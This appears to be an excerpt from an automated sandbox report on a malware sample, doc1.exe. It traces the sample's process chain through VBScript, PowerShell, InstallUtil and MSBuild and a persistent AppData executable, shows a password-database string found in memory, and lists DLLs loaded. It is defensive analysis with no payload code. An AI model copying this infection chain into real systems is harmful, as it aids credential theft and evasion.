                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3472399164.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3472946076.0000000003C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: doc1.exe ReversingLabs: Detection: 52%
                  Source: C:\Users\user\Desktop\doc1.exe File read: C:\Users\user\Desktop\doc1.exe
                  Source: unknown Process created: C:\Users\user\Desktop\doc1.exe "C:\Users\user\Desktop\doc1.exe"
                  Source: C:\Users\user\Desktop\doc1.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe"
                  Source: C:\Users\user\Desktop\doc1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Users\user\AppData\Roaming\bosotkm.exe "C:\Users\user\AppData\Roaming\bosotkm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0"
                  Source: unknown Process created: C:\Users\user\AppData\Roaming\bosotkm.exe "C:\Users\user\AppData\Roaming\bosotkm.exe"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064
                  Source: C:\Users\user\Desktop\doc1.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, ntmarta.dll
                  Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, msxml6.dll, winhttpcom.dll, winhttp.dll, ondemandconnroutehelper.dll (listed 5 times), gpapi.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, taskschd.dll, xmllite.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (listed twice), uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
